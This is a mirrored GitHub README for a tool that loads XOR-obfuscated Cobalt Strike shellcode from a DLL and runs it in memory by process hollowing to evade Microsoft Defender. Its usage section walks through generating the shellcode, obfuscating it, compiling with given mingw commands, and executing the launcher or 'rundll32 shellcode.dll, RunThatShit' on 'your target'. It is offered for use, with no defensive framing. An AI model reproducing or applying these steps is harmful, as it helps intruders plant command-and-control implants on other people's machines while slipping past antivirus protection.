GithubHelp home page GithubHelp logo

r44wk / cobaltstrikebypassdefender Goto Github PK

View Code? Open in Web Editor NEW

This project forked from processust/cobaltstrikebypassdefender

0.0 0.0 0.0 1.57 MB

A launcher to load a DLL with xored cobalt strike shellcode executed in memory through process hollowing technique

C++ 100.00%

cobaltstrikebypassdefender's Introduction

CobaltStrikeBypassDefender



A launcher to load a DLL with xored cobalt strike shellcode executed in memory through process hollowing technique




My youtube video on this repo :




Usage

  1. Generate a x64 cobalt strike shellcode with CSSG :
https://github.com/RCStep/CSSG
  1. Copy your shellcode in obfu.cpp (in "ANTIVIRUS_EXCLUDED_FOLDER" folder) and compile it :
C:\msys64\mingw64\bin\x86_64-w64-mingw32-c++.exe -o obfu.exe obfu.cpp
  1. Execute obfu.exe, give your own xor secret
  2. Copy obfuscated-shellcode.cpp content in dll.cpp file and update shellcode char array variable in process hollowing functions
  3. Compile dll.cpp and launcher.cpp :
C:\msys64\mingw64\bin\x86_64-w64-mingw32-c++.exe -o shellcode.dll -shared dll.cpp

C:\msys64\mingw64\bin\x86_64-w64-mingw32-c++.exe -o launcher.exe launcher.cpp
  1. Copy launcher.exe, shellcode.dll and the 3 library files on your target and execute launcher.exe or trigger the RunThatShit function with rundll32 :
rundll32 shellcode.dll, RunThatShit
  1. Enjoy :)




My blog : https://lestutosdeprocessus.fr

My Discord server : https://discord.gg/JJNxV2h

cobaltstrikebypassdefender's People

Contributors

processust avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.